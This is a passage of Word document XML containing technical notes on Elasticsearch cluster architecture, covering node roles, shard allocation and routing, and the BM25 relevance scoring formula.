      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elasticsearch Cluster Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536677CE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EFC72" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cluster components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F75663" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="45B9FDEA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4ECDB5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Master-eligible nodes: participate in master election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936481B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Store cluster state (index metadata, shard allocation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62792C37" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Dedicated masters (no data) recommended for large clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA23636" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3306959A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Data nodes: store index shards, execute queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA60293" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Hot nodes: NVMe SSD (recent data, high query rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD7BC5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Warm nodes: SATA SSD (older data, moderate query rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D422183" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Cold nodes: HDD or object storage (archival, rare queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C7C7A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53101EA6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Coordinating nodes (client nodes): receive requests, route to data nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74A757" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Parse query, scatter to relevant shards, gather results, merge, return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124470B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Stateless — can scale horizontally for high query throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4506D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE57CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Ingest nodes: execute ingest pipelines (pre-processing before indexing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AB354" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Parse dates, extract fields from log lines, enrich from lookup tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E7A48" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Separate from data nodes to avoid CPU competition with queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C55CAB0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D9410" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Index anatomy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535E04A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Index: logical collection of related documents (like a database table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA2C62" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B5799B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Primary shard: one of N physical shards (default N=1 in ES 7+, was N=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506E628" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Lucene index instance: owns a portion of the total document set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B864DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Determined by: hash(document_routing_field) % number_of_primary_shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11029EC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Cannot change shard count after index creation (requires reindex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91CAA7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70182F66" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Replica shard: copy of a primary shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF47E0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Serves reads (replicas participate in search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D544E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Failover: if primary fails, replica is promoted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC11462" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C37AB7F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Allocation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBB144E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Primary shards: distributed across data nodes (each node owns different shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A06E733" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Replica shards: never on same node as their primary (fault isolation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E07AE7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7AE8F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Example: 3-node cluster, 1 index, 3 primary shards, 1 replica each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00507819" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Node 1: Primary[0], Replica[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C09E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Node 2: Primary[1], Replica[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B402CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Node 3: Primary[2], Replica[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DBBF85" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F3DBC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Each document on exactly 2 nodes (primary + replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44004F21" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Any node failure: all shards still available from other nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE88C2A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="265605AB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Document routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2445DD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Which primary shard receives a document?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039919D6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  shard_id = hash(_routing) % num_primary_shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380E576" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF949E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  _routing default: document _id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C254671" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Custom routing: specify field for locality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C3D1C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    PUT /orders/_doc/order_123?routing=user_456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79912FC3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    → All documents with routing=user_456 go to same shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E24ED0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    → Queries with routing=user_456 go to ONE shard (not scatter-gather)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F66EE1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    → Co-locate user's documents → efficient user-scoped searches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608AE78" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6619E777" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Routing problem: custom routing can cause uneven shard distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD1B113" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    If one user has 10× more documents → that shard is "hot"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2982EE82" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Mitigation: num_routing_shards (over-allocation for routing, merged into fewer storage shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04CB71" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search and Relevance — The Scoring System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FD7C34" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BM25 (Best Match 25) — the default relevance algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38929BAD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B0BF2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>BM25 score for term t in document d:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6236D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A79BE46" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  IDF(t) = log(1 + (N - n(t) + 0.5) / (n(t) + 0.5))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B856DAE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CD756B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    N = total documents in index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E4F1B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    n(t) = documents containing term t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECD925B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7474D8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Rare terms (n(t) small) → high IDF (more discriminating)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B33665" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Common terms (n(t) ≈ N, like "the") → low IDF (less informative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A95CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59920D39" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  TF(t,d) = (f(t,d) × (k1 + 1)) / (f(t,d) + k1 × (1 - b + b × |d|/avgdl))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53123A8B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5CC37B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    f(t,d) = frequency of term t in document d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC42F7B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    k1 = term frequency saturation (default 1.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E6DCF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">           Higher k1: more weight to repeated terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A755DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">           k1=0: BM25 becomes IDF-only (no TF weight)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26962447" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    b = length normalization (default 0.75)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA9095" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        b=1: full normalization (long documents penalized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F898755" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        b=0: no normalization (document length irrelevant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19B49A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    |d| = length of document d (in tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17324101" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    avgdl = average document length across index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF47AA8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2712812F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  BM25(t, d) = IDF(t) × TF(t,d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2AF2F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78376002" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Final score = sum of BM25(t, d) for all query terms t matching document d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B26EE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1828E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Practical implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA526F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "elasticsearch" in a 10-word document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F945CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    High TF relative to document length → high TF score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F72B94" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "elasticsearch" in a 1000-word document:</w:t>
      </w:r>
    </w:p>
